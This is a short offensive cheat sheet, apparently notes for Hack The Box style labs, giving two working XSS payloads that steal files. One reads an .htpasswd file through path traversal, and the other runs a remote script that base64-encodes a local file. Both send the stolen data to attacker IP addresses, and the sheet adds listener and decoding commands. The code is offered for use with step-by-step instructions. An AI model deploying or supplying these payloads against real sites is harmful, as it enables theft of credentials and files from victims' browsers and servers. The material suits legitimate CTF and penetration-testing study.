1. Steal File Content Using Inline XSS Script (HTML) <script> fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd") .then(response => response.text()) .then(data => { fetch("http://10.10.14.228/?data=" + encodeURIComponent(data)); }) .catch(error => console.error("Error fetching the messages:", error)); </script> Explanation: This script tries to read the .htpasswd file from a vulnerable server using a local file inclusion (LFI) or file read vulnerability in the URL parameter file. Then, it sends the stolen file content back to your attacker server (10.10.14.228) using an HTTP request with the data URL-encoded. Works in XSS vulnerable pages where you can inject JS. How to use: Inject this script into an XSS vulnerable parameter or stored XSS vector. Make sure your attacker machine (10.10.14.228) is ready to receive GET requests and log the data parameter. Example listener (using nc or a simple Python HTTP server) to capture data: nc -lvnp 80 # or python3 -m http.server 80 2. External JS File to Steal File Content via XSS (JavaScript) // Usage: // Spawn python HTTP server on attacker box: python3 -m http.server 1212 // Inject in vulnerable page: <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> var url = "http://127.0.0.1/dir/pass.txt"; // Target file on victim var attacker = "http://10.9.179.230:1212/steal_page_content_xss.js"; var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { // send base64 encoded stolen content to attacker server fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) } } xhr.open('GET', url, true); xhr.send(null); Explanation: This script fetches a local file on the victim machine (http://127.0.0.1/dir/pass.txt) via the victim’s browser. When the file is fully loaded (DONE), it encodes the content in Base64 (btoa) to safely transmit binary or special characters. Then sends this encoded content back to attacker server by requesting the script file with data as query string (?data=...). Requires you to host this script on your attacker machine (10.9.179.230) and have an HTTP server running on port 1212. How to use: Start HTTP server on attacker box: python3 -m http.server 1212 Inject <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> into an XSS vulnerable page. Monitor requests on your attacker server to capture the Base64 encoded file contents in the URL. Decode captured Base64 content: echo "base64_encoded_string" | base64 -d > stolen_file.txt Summary Notes: These methods depend on the target browser having access to local files via URL paths (like 127.0.0.1) or vulnerable parameters (LFI). Base64 encoding helps send files safely in GET requests. Must have control over attacker server to catch stolen data. Use during CTF challenges, penetration testing, or in controlled environments. Always check the same-origin policy and CORS restrictions which may block requests in real-world targets.
